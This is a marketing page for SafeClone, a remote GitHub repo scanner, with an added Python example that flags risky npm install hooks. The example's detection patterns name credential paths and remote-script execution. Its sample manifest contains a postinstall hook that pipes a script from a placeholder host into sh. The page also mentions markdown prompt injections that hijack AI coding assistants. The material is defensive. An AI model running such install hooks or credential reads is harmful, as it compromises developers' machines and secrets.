SafeClone scans any GitHub repo for hardcoded secrets, vulnerable dependencies, and dangerous install scripts — before a single line of code touches your machine.
Powered by trusted security tools
SafeClone does all the heavy lifting on a remote server. Your machine stays clean the entire time.
Run safeclone <url> from your terminal. That's the entire workflow — no config, no project setup, no dependencies.
Our server spins up an isolated Docker container, clones the repo inside it, and runs all three scanners in parallel. Nothing executes on your machine.
Get a clear verdict in seconds. Safe repos clone automatically. Dangerous ones show you exactly what was found and prompt you before proceeding.
Every scan runs all four checks simultaneously so you get a complete picture in one go.
Runs TruffleHog against the cloned filesystem. Only verified, active credentials are reported — no noise from already-rotated keys or test fixtures.
Queries the OSV.dev database with exact version pinning across 10 package ecosystems. Only CVEs that affect the specific version declared in the repo are flagged.
Statically analyzes install-time hooks in package manifests for patterns used in supply chain attacks — before any code runs anywhere.
Scans all markdown files for hidden instructions designed to hijack AI coding assistants — Copilot, Cursor, Claude — when they read the repo. Priority targets include CLAUDE.md, .cursorrules, and AGENTS.md.
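As an added illustration of the install-script check described above (example code, not SafeClone's own scanner), this Python snippet inspects the npm lifecycle hooks in a package.json and flags command patterns commonly seen in install-time supply chain attacks. The hook list, the regex heuristics and the sample manifest are assumptions constructed for this example.

```python
import json
import re

# Lifecycle hooks that npm runs automatically during `npm install`
# (the install-time hooks the page refers to). Assumed list for this example.
INSTALL_HOOKS = ("preinstall", "install", "postinstall", "prepare", "prepublish")

# Heuristic patterns (assumed for this example, not SafeClone's own rules).
# Each is a (label, compiled regex) pair matched against the hook command.
SUSPICIOUS_PATTERNS = [
    ("remote-script-exec", re.compile(r"\b(curl|wget)\b[^|;&]*\|\s*(ba|z|da)?sh\b")),
    ("inline-code-eval", re.compile(r"\bnode\s+(-e|--eval)\b|\beval\b")),
    ("encoded-payload", re.compile(r"base64\s+(-d|--decode)|\bfrom_base64\b|\batob\(")),
    ("credential-path", re.compile(r"~/\.(ssh|aws|npmrc|gnupg)\b|/\.npmrc\b")),
    ("env-dump", re.compile(r"\benv\b\s*(>|\||$)|\bprintenv\b")),
]


def scan_manifest(package_json_text):
    """Return a list of findings for install-time hooks in a package.json.

    Each finding is a dict with the hook name, the matched label and the
    raw command, so a caller can render a report before any code runs.
    Non-hook scripts (build, test, ...) are ignored: they do not run on install.
    """
    manifest = json.loads(package_json_text)
    scripts = manifest.get("scripts") or {}
    findings = []
    for hook in INSTALL_HOOKS:
        command = scripts.get(hook)
        if not isinstance(command, str):
            continue
        for label, pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(command):
                findings.append({"hook": hook, "label": label, "command": command})
    return findings


# Constructed sample manifest: a benign build step, a common prepare hook,
# and a postinstall hook that pipes a remote script straight into a shell.
SAMPLE_PACKAGE_JSON = json.dumps({
    "name": "example-pkg",
    "scripts": {
        "build": "tsc -p .",
        "prepare": "husky install",
        "postinstall": "curl -sSL https://example.invalid/setup.sh | sh",
    },
})

if __name__ == "__main__":
    for finding in scan_manifest(SAMPLE_PACKAGE_JSON):
        print(f"{finding['hook']}: {finding['label']} -> {finding['command']}")
```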
No secrets, no vulnerable deps, no dangerous scripts detected. SafeClone proceeds with git clone without prompting.
Vulnerable dependencies or suspicious scripts found, but no active secrets. You see the full report and choose whether to proceed.
Active, verified secrets detected in the repository. SafeClone stops and shows you exactly what was found. Use --force to override.
One binary. No runtime dependencies. No configuration needed.